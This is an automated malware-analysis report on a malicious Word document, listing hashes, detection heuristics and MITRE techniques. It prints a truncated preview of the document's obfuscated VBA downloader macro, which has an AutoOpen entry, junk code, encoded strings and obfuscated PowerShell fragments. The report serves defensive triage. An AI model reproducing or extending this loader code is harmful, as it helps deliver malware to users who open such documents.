Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f89f1901898f8bb9…

MALICIOUS

Office (OLE)

Size: 154.0 KB
Created: 2018-03-21 20:40:00
Authoring application: Microsoft Office Word
First seen: 2019-12-09
MD5: 543dd133fdd39449d1fd09da1124f41e
SHA-1: 60d9959de51b02fe6735636bcc7c04727fae39f2
SHA-256: f89f1901898f8bb9b3949e1659f156298003118160dedeba24b62de5a745657a
Risk Score: 224

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious OLE document containing a VBA macro. The 'AutoOpen' macro, a common auto-execution entry point, is present and uses 'CreateObject' to execute obfuscated code. This strongly suggests that the macro's purpose is to download and execute a secondary payload, a common malware-delivery technique. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' further supports the malicious classification.

Heuristics (8)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro present.
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call present.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 40974 bytes
SHA-256: 95219e1e95ae73e4794a503e7e04a2df466b78fc2238b0a01212bec9d1dd4b0b
Detection: ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 19 long base64-like blob(s).

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "NClwQGowV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "QQfdjilYci"
Function IUuaarQpLJOiiB()
On Error Resume Next
Select Case jKQmvf
         Case 51809
            Rzhzd = Hex(26125 - CSng(6443) - 84068 + ChrW(NzGvo))
            WtBsm = mmjdz
End Select
CfncLFz = PXFdF("4UfcIAMwBkADEAMgA1ADAAZQAyAGEAMQA1ADgANQA3ADMAMAAyAGUANgBkADcAZABjAGIANwBiADUAYwBhADgANwA3ADEAMQAXjH0", 5, 93)
Select Case wNhHZ
         Case 70984
            JwuNzo = Hex(33023 - CSng(85671) - 26729 + ChrW(ZBjrou))
            tmoOiN = VdAHd
End Select
Select Case ZWEdXY
         Case 21648
            wGIJEh = Hex(97026 - CSng(26391) - 15084 + ChrW(NZlaHT))
            CLanw = XIKWV
End Select
VhYvzzNiPzK = PXFdF("I,8BA2ADYAZQBkADYANAAxAGIAZQA1ADAAYQBlADkAYQAxADgAMQA2ADYANQBlADgAZAA3AGYANwA0ADMANwBmADcAOAA2AGMAZAA5AGUAYgA4AGQANQBlAGMANYjK", 5, 119)
Select Case uMbijp
         Case 53454
            BuMzt = Hex(76280 - CSng(96312) - 89685 + ChrW(OzPlW))
            MkLAi = BtLcfM
End Select
Select Case IXXHjB
         Case 68930
            zkMnC = Hex(27180 - CSng(2370) - 58214 + ChrW(hlYhSw))
            LDQGjF = owNiz
End Select
XPXniGOHEa = PXFdF("J5rBAZABkAGIAZgA0ADIANAA5AGEAMAAzAGUAMQBlADEAYgBlAGIAZgBjADMAIuXnq", 5, 57)
Select Case hFWQW
         Case 92161
            iRFjC = Hex(5457 - CSng(95068) - 47282 + ChrW(sCpbqv))
            kdYtjY = pjDTFc
End Select
Select Case kvhLGR
         Case 24919
            mkFRlY = Hex(90909 - CSng(80404) - 28586 + ChrW(wFojwW))
            uUYhT = YsPiF
End Select
fGWazpVWjr = PXFdF("5wNwAyADIAMAAwADcAMgA1ADMAZQBjADcAYgAwADYAOQA3ADEAYgBiADQANABiADUAZABjAGIAMgAyAGIAMwBlADIAYgBlADcANgA0ADIAYQAyADMAZgA4AGQAO5Tpj", 3, 121)
Select Case JGDOLh
         Case 93351
            lLrlvE = Hex(78444 - CSng(45764) - 67249 + ChrW(DzLpLw))
            ESYjZW = qtFYur
End Select
Select Case pYoLW
         Case 29885
            opNuOn = Hex(81443 - CSng(51260) - 90942 + ChrW(QSfhp))
            jouIz = lVnVLz
End Select
dXDFLIz = PXFdF("5dEPJ,114,186,28,235,81,71,74,70,203,169,62,37)) ) )| & ( $SHEllId[1]+$4p", 6, 66)
Select Case hYIjcF
         Case 75080
            pBThrJ = Hex(8648 - CSng(93713) - 4370 + ChrW(kzOFXb))
            wtEsG = bsiOzI
End Select
Select Case MROBr
         Case 90466
            JLNNG = Hex(86670 - CSng(55108) - 72053 + ChrW(FQtuR))
            kCDhrG = iuKoK
End Select
LXWuLMI = PXFdF("busHNADYANwBkADcAYQAzAGYAYQA1AGMAZgAzADcAYwBmAGMAZAA4AGIAZQAzAGYAMwA1AGEAMABkAGQANwAkd", 6, 79)
Select Case ivdrr
         Case 85759
            OWFzZZ = Hex(22623 - CSng(30278) - 21717 + ChrW(DrnOh))
            zJDwo = TCSiUH
End Select
Select Case TojBqK
         Case 39895
            GKjcu = Hex(77996 - CSng(72535) - 955 + ChrW(iKiKUP))
            YNncDq = qOhCI
End Select
RCREIfTU = PXFdF("pgA1AGQAZQA2ADYA' | cOnVerTtO-SECurEstRINg -K  107,78,130,13,65,226,162,247,35,243,236,251jjJu,3q2", 2, 89)
Select Case LQhjv
         Case 78499
            kkwGz = Hex(71717 - CSng(35294) - 49629 + ChrW(iSzZv))
            dWsKQz = NMmdpb
End Select
Select Case UXsjKl
         Case 78708
            jaVwiN = Hex(49472 - CSng(49344) - 26356 + ChrW(sVfdIV))
            fJlmC = HzDzml
End Select
DBLiOH = PXFdF("j13UDUAYgBiADAAYQA5ADgANABlADkAMAA0ADcANAA1ADEAR8FU", 5, 43)
Select Case STdvch
         Case 1921
            AmWlUI = Hex(50598 - CSng(47781) - 90890 + ChrW(PXUfcD))
            hlNAaP = onfYsj
End Select
Select Case nlkwv
         Case 81817
            FHNTW = Hex(983 - CSng(71641) - 37716 + ChrW(ZlIVv))
            FJuwBz = VthPRD
End Select
KuHPU = PXFdF("dP([rUnTime.intEroPSErvicES.marShAl]::([RunTIME.iNTERopSerVICes.marSHal].gETMeMBeRs()[4].nAME).inVOke([RuNTiMe.iNTEropsERVICEs.mARShal]::sEcuReStrINgTo5.b5f", 3, 149)
Select Case inJpaq
         Case 94796
     
... (truncated)